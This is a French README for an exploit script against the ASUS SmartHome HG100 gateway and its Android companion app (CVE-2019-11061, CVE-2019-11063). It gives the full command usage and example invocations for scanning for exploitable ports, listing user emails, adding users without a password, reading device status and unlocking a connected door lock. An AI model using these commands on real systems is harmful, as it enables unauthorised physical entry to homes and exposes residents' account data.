
Exploit ASUS SmartHome pour CVE-2019-11061 et CVE-2019-11063
CVE-2019-11061 : Contrôle d'accès défaillant dans HG100
Produits concernés : ASUS SmartHome Gateway HG100 version du firmware < 4.00.09
CVE-2019-11063 : Contrôle d'accès défaillant dans l'application SmartHome
Produits concernés : application Android ASUS SmartHome version < 3.0.45_190701
Si l'attaquant se trouve sur le même réseau interne que le HG100 ou qu'un appareil mobile avec l'application compagnon (Android ou iPhone). L'attaquant peut envoyer des demandes de contrôle à ceux-ci.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Scanner le port exploitable de l'appareil mobile (avec l'application compagnon installée pour Android ou iPhone) :
P.S. L'option -v listera les utilisateurs qui ont été ajoutés au HG100.
ou
Scanner le port exploitable du HG100 :
Obtenir tous les utilisateurs qui ont été ajoutés au HG100 :

ou en ajouter un nouveau :
Remarque : utilisez https://10.42.50.166:8083 pour l'argument "cmd".
Par exemple :
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Obtenir toutes les informations des appareils connectés à la passerelle SmartHome :
P.S. Si l'option --user n'est pas définie, le premier utilisateur du HG100 sera sélectionné automatiquement. (Parce qu'aucun mot de passe n'est nécessaire)
Comparaison avec l'application :
Contrôler (déverrouiller) le DoorLock.
P.S. la valeur 1028 est obtenue à partir de l'option -l (étape 3).
Résultat :
